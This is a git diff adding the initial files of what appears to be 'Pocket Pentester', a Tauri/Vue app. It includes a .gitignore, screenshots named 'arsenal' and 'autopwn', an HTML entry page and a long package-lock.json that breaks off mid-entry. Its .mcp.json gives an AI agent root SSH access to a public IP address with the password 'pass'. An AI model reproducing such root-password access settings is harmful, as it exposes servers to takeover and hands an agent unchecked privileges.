diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..a547bf3
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,24 @@
+# Logs
+logs
+*.log
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+pnpm-debug.log*
+lerna-debug.log*
+
+node_modules
+dist
+dist-ssr
+*.local
+
+# Editor directories and files
+.vscode/*
+!.vscode/extensions.json
+.idea
+.DS_Store
+*.suo
+*.ntvs*
+*.njsproj
+*.sln
+*.sw?
diff --git a/.mcp.json b/.mcp.json
new file mode 100644
index 0000000..b0a2ba9
--- /dev/null
+++ b/.mcp.json
@@ -0,0 +1,27 @@
+{
+    "mcpServers": {
+        "ssh-mcp": {
+            "command": "npx",
+            "args": [
+                "ssh-mcp",
+                "-y",
+                "--",
+                "--host=52.221.242.70",
+                "--port=22",
+                "--user=root",
+                "--password=pass",
+                "--key=path/to/key",
+                "--timeout=30000",
+                "--maxChars=none"
+            ]
+        },
+       "uiautomator2": {
+  "type": "stdio",
+  "command": "python",
+  "args": [
+    "C:\\Users\\mumur\\uiautomator2-mcp\\server.py"
+  ],
+  "env": {}
+}
+    }
+}
\ No newline at end of file
diff --git a/.vscode/extensions.json b/.vscode/extensions.json
new file mode 100644
index 0000000..cf4385b
--- /dev/null
+++ b/.vscode/extensions.json
@@ -0,0 +1,7 @@
+{
+  "recommendations": [
+    "Vue.volar",
+    "tauri-apps.tauri-vscode",
+    "rust-lang.rust-analyzer"
+  ]
+}
diff --git a/docs/screenshots/arsenal.png b/docs/screenshots/arsenal.png
new file mode 100644
index 0000000..3b35ee1
Binary files /dev/null and b/docs/screenshots/arsenal.png differ
diff --git a/docs/screenshots/autopwn.png b/docs/screenshots/autopwn.png
new file mode 100644
index 0000000..617e178
Binary files /dev/null and b/docs/screenshots/autopwn.png differ
diff --git a/docs/screenshots/splash.png b/docs/screenshots/splash.png
new file mode 100644
index 0000000..45b5430
Binary files /dev/null and b/docs/screenshots/splash.png differ
diff --git a/icon.png b/icon.png
new file mode 100644
index 0000000..b34830a
Binary files /dev/null and b/icon.png differ
diff --git a/imtaqin.id.png b/imtaqin.id.png
new file mode 100644
index 0000000..759ad3f
Binary files /dev/null and b/imtaqin.id.png differ
diff --git a/index.html b/index.html
new file mode 100644
index 0000000..ab2f708
--- /dev/null
+++ b/index.html
@@ -0,0 +1,17 @@
+<!doctype html>
+<html lang="en">
+  <head>
+    <meta charset="UTF-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" />
+    <meta name="theme-color" content="#0a0a0a" />
+    <link rel="preconnect" href="https://fonts.googleapis.com" />
+    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
+    <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@300;400;500;700&family=Space+Mono:wght@400;700&display=swap" rel="stylesheet" />
+    <title>Pocket Pentester</title>
+    <link rel="icon" type="image/png" href="/favicon-32.png" />
+  </head>
+  <body>
+    <div id="app"></div>
+    <script type="module" src="/src/main.ts"></script>
+  </body>
+</html>
diff --git a/package-lock.json b/package-lock.json
new file mode 100644
index 0000000..ce17411
--- /dev/null
+++ b/package-lock.json
@@ -0,0 +1,1793 @@
+{
+  "name": "pocketpentester",
+  "version": "0.1.0",
+  "lockfileVersion": 3,
+  "requires": true,
+  "packages": {
+    "": {
+      "name": "pocketpentester",
+      "version": "0.1.0",
+      "dependencies": {
+        "@tauri-apps/api": "^2",
+        "@tauri-apps/plugin-opener": "^2",
+        "vue": "^3.5.13"
+      },
+      "devDependencies": {
+        "@tauri-apps/cli": "^2",
+        "@vitejs/plugin-vue": "^5.2.1",
+        "typescript": "~5.6.2",
+        "vite": "^6.0.3",
+        "vue-tsc": "^2.1.10"
+      }
+    },
+    "node_modules/@babel/helper-string-parser": {
+      "version": "7.27.1",
+      "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.27.1.tgz",
+      "integrity": "sha512-qMlSxKbpRlAridDExk92nSobyDdpPijUq2DW6oDnUqd0iOGxmQjyqhMIihI9+zv4LPyZdRje2cavWPbCbWm3eA==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=6.9.0"
+      }
+    },
+    "node_modules/@babel/helper-validator-identifier": {
+      "version": "7.28.5",
+      "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.28.5.tgz",
+      "integrity": "sha512-qSs4ifwzKJSV39ucNjsvc6WVHs6b7S03sOh2OcHF9UHfVPqWWALUsNUVzhSBiItjRZoLHx7nIarVjqKVusUZ1Q==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=6.9.0"
+      }
+    },
+    "node_modules/@babel/parser": {
+      "version": "7.29.2",
+      "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.29.2.tgz",
+      "integrity": "sha512-4GgRzy/+fsBa72/RZVJmGKPmZu9Byn8o4MoLpmNe1m8ZfYnz5emHLQz3U4gLud6Zwl0RZIcgiLD7Uq7ySFuDLA==",
+      "license": "MIT",
+      "dependencies": {
+        "@babel/types": "^7.29.0"
+      },
+      "bin": {
+        "parser": "bin/babel-parser.js"
+      },
+      "engines": {
+        "node": ">=6.0.0"
+      }
+    },
+    "node_modules/@babel/types": {
+      "version": "7.29.0",
+      "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.29.0.tgz",
+      "integrity": "sha512-LwdZHpScM4Qz8Xw2iKSzS+cfglZzJGvofQICy7W7v4caru4EaAmyUuO6BGrbyQ2mYV11W0U8j5mBhd14dd3B0A==",
+      "license": "MIT",
+      "dependencies": {
+        "@babel/helper-string-parser": "^7.27.1",
+        "@babel/helper-validator-identifier": "^7.28.5"
+      },
+      "engines": {
+        "node": ">=6.9.0"
+      }
+    },
+    "node_modules/@esbuild/aix-ppc64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.25.12.tgz",
+      "integrity": "sha512-Hhmwd6CInZ3dwpuGTF8fJG6yoWmsToE+vYgD4nytZVxcu1ulHpUQRAB1UJ8+N1Am3Mz4+xOByoQoSZf4D+CpkA==",
+      "cpu": [
+        "ppc64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "aix"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/android-arm": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.25.12.tgz",
+      "integrity": "sha512-VJ+sKvNA/GE7Ccacc9Cha7bpS8nyzVv0jdVgwNDaR4gDMC/2TTRc33Ip8qrNYUcpkOHUT5OZ0bUcNNVZQ9RLlg==",
+      "cpu": [
+        "arm"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "android"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/android-arm64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.25.12.tgz",
+      "integrity": "sha512-6AAmLG7zwD1Z159jCKPvAxZd4y/VTO0VkprYy+3N2FtJ8+BQWFXU+OxARIwA46c5tdD9SsKGZ/1ocqBS/gAKHg==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "android"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/android-x64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.25.12.tgz",
+      "integrity": "sha512-5jbb+2hhDHx5phYR2By8GTWEzn6I9UqR11Kwf22iKbNpYrsmRB18aX/9ivc5cabcUiAT/wM+YIZ6SG9QO6a8kg==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "android"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/darwin-arm64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.25.12.tgz",
+      "integrity": "sha512-N3zl+lxHCifgIlcMUP5016ESkeQjLj/959RxxNYIthIg+CQHInujFuXeWbWMgnTo4cp5XVHqFPmpyu9J65C1Yg==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "darwin"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/darwin-x64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.25.12.tgz",
+      "integrity": "sha512-HQ9ka4Kx21qHXwtlTUVbKJOAnmG1ipXhdWTmNXiPzPfWKpXqASVcWdnf2bnL73wgjNrFXAa3yYvBSd9pzfEIpA==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "darwin"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/freebsd-arm64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.25.12.tgz",
+      "integrity": "sha512-gA0Bx759+7Jve03K1S0vkOu5Lg/85dou3EseOGUes8flVOGxbhDDh/iZaoek11Y8mtyKPGF3vP8XhnkDEAmzeg==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "freebsd"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/freebsd-x64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.25.12.tgz",
+      "integrity": "sha512-TGbO26Yw2xsHzxtbVFGEXBFH0FRAP7gtcPE7P5yP7wGy7cXK2oO7RyOhL5NLiqTlBh47XhmIUXuGciXEqYFfBQ==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "freebsd"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-arm": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.25.12.tgz",
+      "integrity": "sha512-lPDGyC1JPDou8kGcywY0YILzWlhhnRjdof3UlcoqYmS9El818LLfJJc3PXXgZHrHCAKs/Z2SeZtDJr5MrkxtOw==",
+      "cpu": [
+        "arm"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-arm64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.25.12.tgz",
+      "integrity": "sha512-8bwX7a8FghIgrupcxb4aUmYDLp8pX06rGh5HqDT7bB+8Rdells6mHvrFHHW2JAOPZUbnjUpKTLg6ECyzvas2AQ==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-ia32": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.25.12.tgz",
+      "integrity": "sha512-0y9KrdVnbMM2/vG8KfU0byhUN+EFCny9+8g202gYqSSVMonbsCfLjUO+rCci7pM0WBEtz+oK/PIwHkzxkyharA==",
+      "cpu": [
+        "ia32"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-loong64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.25.12.tgz",
+      "integrity": "sha512-h///Lr5a9rib/v1GGqXVGzjL4TMvVTv+s1DPoxQdz7l/AYv6LDSxdIwzxkrPW438oUXiDtwM10o9PmwS/6Z0Ng==",
+      "cpu": [
+        "loong64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-mips64el": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.25.12.tgz",
+      "integrity": "sha512-iyRrM1Pzy9GFMDLsXn1iHUm18nhKnNMWscjmp4+hpafcZjrr2WbT//d20xaGljXDBYHqRcl8HnxbX6uaA/eGVw==",
+      "cpu": [
+        "mips64el"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-ppc64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.25.12.tgz",
+      "integrity": "sha512-9meM/lRXxMi5PSUqEXRCtVjEZBGwB7P/D4yT8UG/mwIdze2aV4Vo6U5gD3+RsoHXKkHCfSxZKzmDssVlRj1QQA==",
+      "cpu": [
+        "ppc64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-riscv64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.25.12.tgz",
+      "integrity": "sha512-Zr7KR4hgKUpWAwb1f3o5ygT04MzqVrGEGXGLnj15YQDJErYu/BGg+wmFlIDOdJp0PmB0lLvxFIOXZgFRrdjR0w==",
+      "cpu": [
+        "riscv64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-s390x": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.25.12.tgz",
+      "integrity": "sha512-MsKncOcgTNvdtiISc/jZs/Zf8d0cl/t3gYWX8J9ubBnVOwlk65UIEEvgBORTiljloIWnBzLs4qhzPkJcitIzIg==",
+      "cpu": [
+        "s390x"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-x64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.25.12.tgz",
+      "integrity": "sha512-uqZMTLr/zR/ed4jIGnwSLkaHmPjOjJvnm6TVVitAa08SLS9Z0VM8wIRx7gWbJB5/J54YuIMInDquWyYvQLZkgw==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/netbsd-arm64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.25.12.tgz",
+      "integrity": "sha512-xXwcTq4GhRM7J9A8Gv5boanHhRa/Q9KLVmcyXHCTaM4wKfIpWkdXiMog/KsnxzJ0A1+nD+zoecuzqPmCRyBGjg==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "netbsd"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/netbsd-x64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.25.12.tgz",
+      "integrity": "sha512-Ld5pTlzPy3YwGec4OuHh1aCVCRvOXdH8DgRjfDy/oumVovmuSzWfnSJg+VtakB9Cm0gxNO9BzWkj6mtO1FMXkQ==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "netbsd"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/openbsd-arm64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.25.12.tgz",
+      "integrity": "sha512-fF96T6KsBo/pkQI950FARU9apGNTSlZGsv1jZBAlcLL1MLjLNIWPBkj5NlSz8aAzYKg+eNqknrUJ24QBybeR5A==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "openbsd"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/openbsd-x64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.25.12.tgz",
+      "integrity": "sha512-MZyXUkZHjQxUvzK7rN8DJ3SRmrVrke8ZyRusHlP+kuwqTcfWLyqMOE3sScPPyeIXN/mDJIfGXvcMqCgYKekoQw==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "openbsd"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/openharmony-arm64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/openharmony-arm64/-/openharmony-arm64-0.25.12.tgz",
+      "integrity": "sha512-rm0YWsqUSRrjncSXGA7Zv78Nbnw4XL6/dzr20cyrQf7ZmRcsovpcRBdhD43Nuk3y7XIoW2OxMVvwuRvk9XdASg==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "openharmony"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/sunos-x64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.25.12.tgz",
+      "integrity": "sha512-3wGSCDyuTHQUzt0nV7bocDy72r2lI33QL3gkDNGkod22EsYl04sMf0qLb8luNKTOmgF/eDEDP5BFNwoBKH441w==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "sunos"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/win32-arm64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.25.12.tgz",
+      "integrity": "sha512-rMmLrur64A7+DKlnSuwqUdRKyd3UE7oPJZmnljqEptesKM8wx9J8gx5u0+9Pq0fQQW8vqeKebwNXdfOyP+8Bsg==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/win32-ia32": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.25.12.tgz",
+      "integrity": "sha512-HkqnmmBoCbCwxUKKNPBixiWDGCpQGVsrQfJoVGYLPT41XWF8lHuE5N6WhVia2n4o5QK5M4tYr21827fNhi4byQ==",
+      "cpu": [
+        "ia32"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/win32-x64": {
+      "version": "0.25.12",
+      "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.25.12.tgz",
+      "integrity": "sha512-alJC0uCZpTFrSL0CCDjcgleBXPnCrEAhTBILpeAp7M/OFgoqtAetfBzX0xM00MUsVVPpVjlPuMbREqnZCXaTnA==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@jridgewell/sourcemap-codec": {
+      "version": "1.5.5",
+      "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.5.tgz",
+      "integrity": "sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og==",
+      "license": "MIT"
+    },
+    "node_modules/@rollup/rollup-android-arm-eabi": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-android-arm-eabi/-/rollup-android-arm-eabi-4.60.1.tgz",
+      "integrity": "sha512-d6FinEBLdIiK+1uACUttJKfgZREXrF0Qc2SmLII7W2AD8FfiZ9Wjd+rD/iRuf5s5dWrr1GgwXCvPqOuDquOowA==",
+      "cpu": [
+        "arm"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "android"
+      ]
+    },
+    "node_modules/@rollup/rollup-android-arm64": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-android-arm64/-/rollup-android-arm64-4.60.1.tgz",
+      "integrity": "sha512-YjG/EwIDvvYI1YvYbHvDz/BYHtkY4ygUIXHnTdLhG+hKIQFBiosfWiACWortsKPKU/+dUwQQCKQM3qrDe8c9BA==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "android"
+      ]
+    },
+    "node_modules/@rollup/rollup-darwin-arm64": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-darwin-arm64/-/rollup-darwin-arm64-4.60.1.tgz",
+      "integrity": "sha512-mjCpF7GmkRtSJwon+Rq1N8+pI+8l7w5g9Z3vWj4T7abguC4Czwi3Yu/pFaLvA3TTeMVjnu3ctigusqWUfjZzvw==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "darwin"
+      ]
+    },
+    "node_modules/@rollup/rollup-darwin-x64": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-darwin-x64/-/rollup-darwin-x64-4.60.1.tgz",
+      "integrity": "sha512-haZ7hJ1JT4e9hqkoT9R/19XW2QKqjfJVv+i5AGg57S+nLk9lQnJ1F/eZloRO3o9Scy9CM3wQ9l+dkXtcBgN5Ew==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "darwin"
+      ]
+    },
+    "node_modules/@rollup/rollup-freebsd-arm64": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-freebsd-arm64/-/rollup-freebsd-arm64-4.60.1.tgz",
+      "integrity": "sha512-czw90wpQq3ZsAVBlinZjAYTKduOjTywlG7fEeWKUA7oCmpA8xdTkxZZlwNJKWqILlq0wehoZcJYfBvOyhPTQ6w==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "freebsd"
+      ]
+    },
+    "node_modules/@rollup/rollup-freebsd-x64": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-freebsd-x64/-/rollup-freebsd-x64-4.60.1.tgz",
+      "integrity": "sha512-KVB2rqsxTHuBtfOeySEyzEOB7ltlB/ux38iu2rBQzkjbwRVlkhAGIEDiiYnO2kFOkJp+Z7pUXKyrRRFuFUKt+g==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "freebsd"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-arm-gnueabihf": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm-gnueabihf/-/rollup-linux-arm-gnueabihf-4.60.1.tgz",
+      "integrity": "sha512-L+34Qqil+v5uC0zEubW7uByo78WOCIrBvci69E7sFASRl0X7b/MB6Cqd1lky/CtcSVTydWa2WZwFuWexjS5o6g==",
+      "cpu": [
+        "arm"
+      ],
+      "dev": true,
+      "libc": [
+        "glibc"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-arm-musleabihf": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm-musleabihf/-/rollup-linux-arm-musleabihf-4.60.1.tgz",
+      "integrity": "sha512-n83O8rt4v34hgFzlkb1ycniJh7IR5RCIqt6mz1VRJD6pmhRi0CXdmfnLu9dIUS6buzh60IvACM842Ffb3xd6Gg==",
+      "cpu": [
+        "arm"
+      ],
+      "dev": true,
+      "libc": [
+        "musl"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-arm64-gnu": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm64-gnu/-/rollup-linux-arm64-gnu-4.60.1.tgz",
+      "integrity": "sha512-Nql7sTeAzhTAja3QXeAI48+/+GjBJ+QmAH13snn0AJSNL50JsDqotyudHyMbO2RbJkskbMbFJfIJKWA6R1LCJQ==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "libc": [
+        "glibc"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-arm64-musl": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm64-musl/-/rollup-linux-arm64-musl-4.60.1.tgz",
+      "integrity": "sha512-+pUymDhd0ys9GcKZPPWlFiZ67sTWV5UU6zOJat02M1+PiuSGDziyRuI/pPue3hoUwm2uGfxdL+trT6Z9rxnlMA==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "libc": [
+        "musl"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-loong64-gnu": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-loong64-gnu/-/rollup-linux-loong64-gnu-4.60.1.tgz",
+      "integrity": "sha512-VSvgvQeIcsEvY4bKDHEDWcpW4Yw7BtlKG1GUT4FzBUlEKQK0rWHYBqQt6Fm2taXS+1bXvJT6kICu5ZwqKCnvlQ==",
+      "cpu": [
+        "loong64"
+      ],
+      "dev": true,
+      "libc": [
+        "glibc"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-loong64-musl": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-loong64-musl/-/rollup-linux-loong64-musl-4.60.1.tgz",
+      "integrity": "sha512-4LqhUomJqwe641gsPp6xLfhqWMbQV04KtPp7/dIp0nzPxAkNY1AbwL5W0MQpcalLYk07vaW9Kp1PBhdpZYYcEw==",
+      "cpu": [
+        "loong64"
+      ],
+      "dev": true,
+      "libc": [
+        "musl"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-ppc64-gnu": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-ppc64-gnu/-/rollup-linux-ppc64-gnu-4.60.1.tgz",
+      "integrity": "sha512-tLQQ9aPvkBxOc/EUT6j3pyeMD6Hb8QF2BTBnCQWP/uu1lhc9AIrIjKnLYMEroIz/JvtGYgI9dF3AxHZNaEH0rw==",
+      "cpu": [
+        "ppc64"
+      ],
+      "dev": true,
+      "libc": [
+        "glibc"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-ppc64-musl": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-ppc64-musl/-/rollup-linux-ppc64-musl-4.60.1.tgz",
+      "integrity": "sha512-RMxFhJwc9fSXP6PqmAz4cbv3kAyvD1etJFjTx4ONqFP9DkTkXsAMU4v3Vyc5BgzC+anz7nS/9tp4obsKfqkDHg==",
+      "cpu": [
+        "ppc64"
+      ],
+      "dev": true,
+      "libc": [
+        "musl"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-riscv64-gnu": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-riscv64-gnu/-/rollup-linux-riscv64-gnu-4.60.1.tgz",
+      "integrity": "sha512-QKgFl+Yc1eEk6MmOBfRHYF6lTxiiiV3/z/BRrbSiW2I7AFTXoBFvdMEyglohPj//2mZS4hDOqeB0H1ACh3sBbg==",
+      "cpu": [
+        "riscv64"
+      ],
+      "dev": true,
+      "libc": [
+        "glibc"
+      ],
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ]
+    },
+    "node_modules/@rollup/rollup-linux-riscv64-musl": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-riscv64-musl/-/rollup-linux-riscv64-musl-4.60.1.tgz",
